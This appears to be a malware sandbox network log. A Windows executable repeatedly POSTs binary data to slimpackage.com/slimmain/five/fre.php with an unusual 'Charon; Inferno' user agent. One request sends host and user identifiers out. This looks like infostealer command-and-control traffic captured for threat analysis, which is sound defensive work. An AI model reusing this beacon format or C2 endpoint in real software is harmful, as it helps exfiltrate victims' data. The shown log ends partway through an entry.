                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    1192.168.2.349744104.223.93.10580C:\Users\user\Desktop\__.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 09:24:22.998234034 CET1029OUTPOST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 190
                    Connection: close
                    Jan 14, 2022 09:24:23.255940914 CET1030INHTTP/1.1 404 Not Found
                    Date: Fri, 14 Jan 2022 08:24:22 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    10192.168.2.349753104.223.93.10580C:\Users\user\Desktop\__.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 09:24:37.035382032 CET1138OUTPOST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:24:37.315669060 CET1139INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:24:36 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    11192.168.2.349754104.223.93.10580C:\Users\user\Desktop\__.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 09:24:38.459969044 CET1140OUTPOST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:24:38.799472094 CET1140INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:24:37 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    12192.168.2.349755104.223.93.10580C:\Users\user\Desktop\__.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 09:24:41.014482975 CET1146OUTPOST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:24:41.266432047 CET1164INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:24:40 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    13192.168.2.349758104.223.93.10580C:\Users\user\Desktop\__.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 09:24:43.765625000 CET1165OUTPOST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:24:44.023281097 CET1165INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:24:42 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    14192.168.2.349759104.223.93.10580C:\Users\user\Desktop\__.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 09:24:46.465908051 CET1166OUTPOST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:24:46.803215981 CET1167INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:24:45 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    15192.168.2.349760104.223.93.10580C:\Users\user\Desktop\__.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 09:24:49.164146900 CET1168OUTPOST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:24:49.421993971 CET1168INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:24:48 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    16192.168.2.349761104.223.93.10580C:\Users\user\Desktop\__.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 09:24:50.858341932 CET1169OUTPOST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:24:51.892734051 CET1170OUTPOST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 00 37 00 31 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 38 00 46 00 39 00 43 00 34 00 45 00 39 00 43 00 37 00 39 00 41 00 33 00 42 00 35 00 32 00 42 00 33 00 46 00 37 00 33 00 39 00 34 00 33 00 30 00
                    Data Ascii: (ckav.ruhardz093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 09:24:52.023314953 CET1170INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:24:51 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    17192.168.2.349762104.223.93.10580C:\Users\user\Desktop\__.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 09:24:53.504302025 CET1171OUTPOST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:24:53.758002996 CET1172INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:24:52 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    18192.168.2.349763104.223.93.10580C:\Users\user\Desktop\__.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 09:24:54.799105883 CET1172OUTPOST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:24:55.056551933 CET1173INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:24:53 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    19192.168.2.349764104.223.93.10580C:\Users\user\Desktop\__.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 09:24:56.589623928 CET1174OUTPOST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:24:56.896958113 CET1174INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:24:55 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    2192.168.2.349745104.223.93.10580C:\Users\user\Desktop\__.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 09:24:24.618609905 CET1031OUTPOST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:24:24.875466108 CET1031INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:24:23 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    20192.168.2.349765104.223.93.10580C:\Users\user\Desktop\__.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 09:24:58.517148972 CET1175OUTPOST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:24:58.772927046 CET1176INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:24:57 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    21192.168.2.349766104.223.93.10580C:\Users\user\Desktop\__.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 09:25:00.494412899 CET1177OUTPOST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:25:00.749394894 CET1178INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:24:59 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    22192.168.2.349767104.223.93.10580C:\Users\user\Desktop\__.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 09:25:02.175263882 CET1178OUTPOST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:25:02.432002068 CET1179INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:25:01 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    23192.168.2.349769104.223.93.10580C:\Users\user\Desktop\__.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 09:25:04.821826935 CET1190OUTPOST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:25:05.078097105 CET1191INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:25:04 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    24192.168.2.349770104.223.93.10580C:\Users\user\Desktop\__.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 09:25:07.361011028 CET1192OUTPOST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:25:07.622387886 CET1192INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:25:06 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    25192.168.2.349771104.223.93.10580C:\Users\user\Desktop\__.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 09:25:08.948328972 CET1193OUTPOST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:25:09.216919899 CET1194INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:25:08 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    26192.168.2.349772104.223.93.10580C:\Users\user\Desktop\__.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 09:25:10.960978031 CET1195OUTPOST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:25:11.313667059 CET1205INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:25:10 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    27192.168.2.349781104.223.93.10580C:\Users\user\Desktop\__.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 09:25:12.466061115 CET1342OUTPOST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:25:12.719638109 CET1346INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:25:11 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    28192.168.2.349791104.223.93.10580C:\Users\user\Desktop\__.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 09:25:13.878221989 CET1518OUTPOST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:25:14.138359070 CET1523INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:25:13 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    29192.168.2.349809104.223.93.10580C:\Users\user\Desktop\__.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 09:25:17.178733110 CET2018OUTPOST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:25:17.435230970 CET2019INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:25:16 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    3192.168.2.349746104.223.93.10580C:\Users\user\Desktop\__.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 09:24:26.009494066 CET1032OUTPOST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:24:26.305594921 CET1033INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:24:25 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    30192.168.2.349810104.223.93.10580C:\Users\user\Desktop\__.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 09:25:20.254046917 CET2019OUTPOST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:25:20.562068939 CET2020INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:25:19 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    31192.168.2.349811104.223.93.10580C:\Users\user\Desktop\__.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 09:25:24.894113064 CET2021OUTPOST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:25:25.157571077 CET2021INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:25:24 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    32192.168.2.349817104.223.93.10580C:\Users\user\Desktop\__.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 09:25:27.413146019 CET4663OUTPOST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:25:27.684449911 CET5953INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:25:26 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    33192.168.2.349818104.223.93.10580C:\Users\user\Desktop\__.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 09:25:32.783225060 CET9938OUTPOST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:25:33.072432041 CET9939INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:25:31 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    34192.168.2.349819104.223.93.10580C:\Users\user\Desktop\__.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 09:25:35.615469933 CET9940OUTPOST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:25:35.870157003 CET9940INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:25:34 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    35192.168.2.349821104.223.93.10580C:\Users\user\Desktop\__.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 09:25:37.954643011 CET10743OUTPOST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:25:38.208590984 CET10744INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:25:37 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    36192.168.2.349822104.223.93.10580C:\Users\user\Desktop\__.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 09:25:40.432496071 CET10745OUTPOST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:25:40.701186895 CET10748INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:25:39 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    37192.168.2.349830104.223.93.10580C:\Users\user\Desktop\__.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 09:25:43.095140934 CET10761OUTPOST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:25:43.349975109 CET10764INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:25:42 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    38192.168.2.349837104.223.93.10580C:\Users\user\Desktop\__.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 09:25:44.516567945 CET10778OUTPOST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:25:44.775058985 CET10781INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:25:43 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    39192.168.2.349844104.223.93.10580C:\Users\user\Desktop\__.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 09:25:45.910084963 CET10794OUTPOST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:25:46.169789076 CET10797INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:25:45 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    4192.168.2.349747104.223.93.10580C:\Users\user\Desktop\__.exe
                    TimestampkBytes transferredDirectionData
